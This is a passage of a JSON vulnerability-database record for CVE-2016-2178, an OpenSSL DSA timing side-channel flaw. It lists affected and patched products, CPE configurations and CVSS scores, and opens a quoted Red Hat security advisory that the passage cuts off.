"version": "11.5" }, { "model": "packetshaper s-series", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "11.4" }, { "model": "packetshaper s-series", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "11.3" }, { "model": "packetshaper s-series", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "11.2" }, { "model": "packetshaper", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "9.2" }, { "model": "norman shark scada protection", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.3" }, { "model": "norman shark network protection", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.3" }, { "model": "norman shark industrial control system protection", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.3" }, { "model": "management center", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "1.7" }, { "model": "malware analysis appliance", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "4.2" }, { "model": "vm virtualbox", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "5.1.8" }, { "model": "vm virtualbox", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "5.0.28" }, { "model": "oss support tools", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "8.15.17.3.14" }, { "model": "email gateway", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "7.6.406-3402.103" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.1.1051.08" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20290.1" }, { "model": "tivoli provisioning manager for images build", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20290.1" }, { "model": "sterling connect:express for unix ifix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.13150-13" }, { "model": "sonas", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.5.2.5" }, { "model": "security network protection", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.3.3.1" }, { "model": "security network protection", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.5" }, { "model": "security network protection", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.11" }, { "model": "sdk for node.js", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "6.7.0.0" }, { "model": "sdk for node.js", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "4.6.0.0" }, { "model": "sdk for node.js", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.15" }, { "model": "sdk for node.js", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.4" }, { "model": "powerkvm update", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.23" }, { "model": "powerkvm update", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.1.1.3-6513" }, { "model": "bigfix remote control", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.1.3" }, { "model": "wireless lan controller", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.4" }, { "model": "webex meetings server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.6.1.30" }, { "model": "webex meetings for windows phone", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "82.8" }, { "model": "webex meetings client on-premises t32", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "webex meetings client hosted t32", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "webex centers t32", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "virtualization experience media edition", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "virtual security gateway", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.1.6" }, { "model": "videoscape anyres live", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9.7.2" }, { "model": "video surveillance ptz ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.9" }, { "model": "video surveillance series ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70002.9" }, { "model": "video surveillance series ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "60002.9" }, { "model": "video surveillance 4300e and 4500e high-definition ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.9" }, { "model": "video surveillance series high-definition ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "40002.9" }, { "model": "video surveillance series ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "30002.9" }, { "model": "video distribution suite for internet streaming", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.003(002)" }, { "model": "universal small cell iuh", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.17.3" }, { "model": "universal small cell cloudbase factory recovery root filesystem", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.17.3" }, { "model": "universal small cell series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70003.5.12.23" }, { "model": "universal small cell series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "50003.5.12.23" }, { "model": "unity express", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10" }, { "model": "unified workforce optimization quality management solution 11.5 su1", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "unified sip proxy software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10" }, { "model": "unified meetingplace 8.6mr1", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "unified ip conference phone for third-party call control 9.3 sr3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8831" }, { "model": "unified ip conference phone 10.3.1sr4", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8831" }, { "model": "unified ip phone 9.3 sr3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6901" }, { "model": "unified intelligent contact management enterprise", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6.1" }, { "model": "unified intelligence center", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6(1)" }, { "model": "unified contact center express", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6" }, { "model": "unified contact center enterprise", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6.1" }, { "model": "ucs standalone c-series rack server integrated management cont", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "-3.0" }, { "model": "ucs b-series blade servers", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.1.3" }, { "model": "uc integration for microsoft lync", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6.3" }, { "model": "telepresence video communication server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "x8.8.3" }, { "model": "telepresence tx9000 series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.1" }, { "model": "telepresence system tx1310", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.1" }, { "model": "telepresence system ex series tc7.3.7", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "telepresence system ex series ce8.2.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "telepresence system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "500-376.1" }, { "model": "telepresence system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "500-326.1" }, { "model": "telepresence system series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "30006.1" }, { "model": "telepresence system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "13006.1" }, { "model": "telepresence system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11006.1" }, { "model": "telepresence system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10006.1" }, { "model": "telepresence sx series tc7.3.7", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "telepresence sx series ce8.2.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "telepresence server on multiparty media", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8204.4" }, { "model": "telepresence server on multiparty media and", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3103204.4" }, { "model": "telepresence server and mse", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "701087104.4" }, { "model": "telepresence profile series tc7.3.7", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "telepresence profile series ce8.2.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "telepresence mx series tc7.3.7", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "telepresence mx series ce8.2.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "telepresence mcu", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.5(1.89)" }, { "model": "telepresence integrator c series tc7.3.7", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "telepresence integrator c series ce8.2.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "spa232d multi-line dect analog telephone adapter", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.4.2" }, { "model": "spa122 analog telephone adapter with router", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.4.2" }, { "model": "spa112 2-port phone adapter", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.4.2" }, { "model": "services provisioning platform sfp1.1", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "security manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.13" }, { "model": "secure access control system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.8.0.32.8" }, { "model": "secure access control system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.8.0.32.7" }, { "model": "prime performance manager sp1611", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.7" }, { "model": "prime network services controller 1.01u", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "prime network registrar", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.3.5" }, { "model": "prime network registrar", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9.0" }, { "model": "prime network", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "431" }, { "model": "prime infrastructure", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.2" }, { "model": "prime collaboration provisioning", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6" }, { "model": "prime collaboration assurance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6" }, { "model": "ons series multiservice provisioning platforms", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1545410.7" }, { "model": "nexus series switches standalone nx-os mode 7.0 i5", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9000-" }, { "model": "nexus series fabric switches aci mode", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9000-0" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70006.2.19" }, { "model": "nexus series switches 5.2.8", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7000" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "60006.2.19" }, { "model": "nexus series switches 5.2.8", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6000" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "50006.2.19" }, { "model": "nexus series switches 5.2.8", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5000" }, { "model": "nexus series blade switches 4.1 e1", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4000" }, { "model": "nexus series switches 5.2 sv3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1000v" }, { "model": "network analysis module", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.2(2)" }, { "model": "network analysis module 6.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "netflow generation appliance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.1(1)" }, { "model": "mds series multilayer switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "90006.2.19" }, { "model": "mds series multilayer switches 5.2.8", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9000" }, { "model": "jabber software development kit", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "jabber guest", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11" }, { "model": "jabber for windows", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "jabber for mac", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "jabber for iphone and ipad", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "jabber for android", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "jabber client framework components", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "ip interoperability and collaboration system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.0(1)" }, { "model": "ios and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "16.4" }, { "model": "ios and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "16.3" }, { "model": "ios and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "16.2" }, { "model": "ios and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "16.1" }, { "model": "ios and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "15.5(3)" }, { "model": "firesight system software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.1.0.1" }, { "model": "firesight system software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.0.1.3" }, { "model": "firesight system software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.4.1.9" }, { "model": "firesight system software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.4.0.10" }, { "model": "expressway series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "x8.8.3" }, { "model": "enterprise content delivery system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.6.9" }, { "model": "email security appliance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10.0.1" }, { "model": "edge digital media player 1.2rb1.0.3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "340" }, { "model": "edge digital media player 1.6rb5", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "300" }, { "model": "digital media manager 5.4.1 rb4", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "digital media manager 5.3.6 rb3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "dcm series d9900 digital content manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "content security management appliance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.1.140" }, { "model": "connected grid routers", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "15.8.9" }, { "model": "connected grid routers", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.3" }, { "model": "computer telephony integration object server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6.1" }, { "model": "common services platform collector", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.11" }, { "model": "ata series analog terminal adaptors", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1901.3" }, { "model": "asr series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "500021.2" }, { "model": "asa next-generation firewall services", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.1.2" }, { "model": "application policy infrastructure controller", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.2(1)" }, { "model": "anyconnect secure mobility client for windows", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0.7" }, { "model": "anyconnect secure mobility client for mac os", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "x4.0.7" }, { "model": "anyconnect secure mobility client for linux", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0.7" }, { "model": "anyconnect secure mobility client for ios", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0.7" }, { "model": "anyconnect secure mobility client for desktop platforms", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.3.4" }, { "model": "anyconnect secure mobility client for desktop platforms", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.4" }, { "model": "anyconnect secure mobility client for android", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0.7" }, { "model": "aironet series access points", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "270016.4" }, { "model": "aironet series access points", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "270016.3" }, { "model": "aironet series access points", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "270016.2" }, { "model": "aironet series access points", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "270016.1" }, { "model": "aironet series access points", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "270015.5(3)" }, { "model": "industrial router 1.2.1rb4", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "910" }, { "model": "series digital media players 5.4.1 rb4", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4400" }, { "model": "series digital media players 5.3.6 rb3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4400" }, { "model": "series digital media players 5.4.1 rb4", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4300" }, { "model": "series digital media players 5.3.6 rb3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4300" } ], "sources": [ { "db": "BID", "id": "91081" }, { "db": "JVNDB", "id": "JVNDB-2016-003305" }, { "db": "NVD", "id": "CVE-2016-2178" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1r:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1p:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1n:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1q:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1o:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:oracle:solaris:11.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:oracle:linux:5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:oracle:solaris:10:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:oracle:linux:6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:oracle:linux:7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:suse:linux_enterprise:12.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:nodejs:node.js:*:*:*:*:-:*:*:*", "cpe_name": [], "versionEndIncluding": "4.1.2", "versionStartIncluding": "4.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:nodejs:node.js:*:*:*:*:-:*:*:*", "cpe_name": [], "versionEndExcluding": "0.12.16", "versionStartIncluding": "0.12.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:nodejs:node.js:*:*:*:*:-:*:*:*", "cpe_name": [], "versionEndExcluding": "0.10.47", "versionStartIncluding": "0.10.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:nodejs:node.js:*:*:*:*:lts:*:*:*", "cpe_name": [], "versionEndExcluding": "4.6.0", "versionStartIncluding": "4.2.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:nodejs:node.js:*:*:*:*:-:*:*:*", "cpe_name": [], "versionEndExcluding": "6.7.0", "versionStartIncluding": "5.0.0", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:-:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2016-2178" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Red Hat", "sources": [ { "db": "PACKETSTORM", "id": "138870" }, { "db": "PACKETSTORM", "id": "143176" }, { "db": "PACKETSTORM", "id": "143181" }, { "db": "PACKETSTORM", "id": "140182" } ], "trust": 0.4 }, "cve": "CVE-2016-2178", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "author": "NVD", "availabilityImpact": "NONE", "baseScore": 2.1, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 3.9, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "LOW", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Local", "authentication": "None", "author": "NVD", "availabilityImpact": "None", "baseScore": 2.1, "confidentialityImpact": "Partial", "exploitabilityScore": null, "id": "CVE-2016-2178", "impactScore": null, "integrityImpact": "None", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Low", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "LOCAL", "author": "NVD", "availabilityImpact": "NONE", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "exploitabilityScore": 1.8, "impactScore": 3.6, "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Local", "author": "NVD", "availabilityImpact": "None", "baseScore": 5.5, "baseSeverity": "Medium", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "CVE-2016-2178", "impactScore": null, "integrityImpact": "None", "privilegesRequired": "Low", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0" } ], "severity": [ { "author": "NVD", "id": "CVE-2016-2178", "trust": 1.8, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2016-2178", "trust": 0.1, "value": "LOW" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-2178" }, { "db": "JVNDB", "id": "JVNDB-2016-003305" }, { "db": "NVD", "id": "CVE-2016-2178" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The dsa_sign_setup function in crypto/dsa/dsa_ossl.c in OpenSSL through 1.0.2h does not properly ensure the use of constant-time operations, which makes it easier for local users to discover a DSA private key via a timing side-channel attack. OpenSSL is prone to a local information-disclosure vulnerability. \nLocal attackers can exploit this issue to obtain sensitive information. This may aid in further attacks. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: openssl security update\nAdvisory ID: RHSA-2016:1940-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2016-1940.html\nIssue date: 2016-09-27\nCVE Names: CVE-2016-2177 CVE-2016-2178 CVE-2016-2179 \n CVE-2016-2180 CVE-2016-2181 CVE-2016-2182 \n CVE-2016-6302 CVE-2016-6304 CVE-2016-6306 \n=====================================================================\n\n1. Summary:\n\nAn update for openssl is now available for Red Hat Enterprise Linux 6 and\nRed Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common 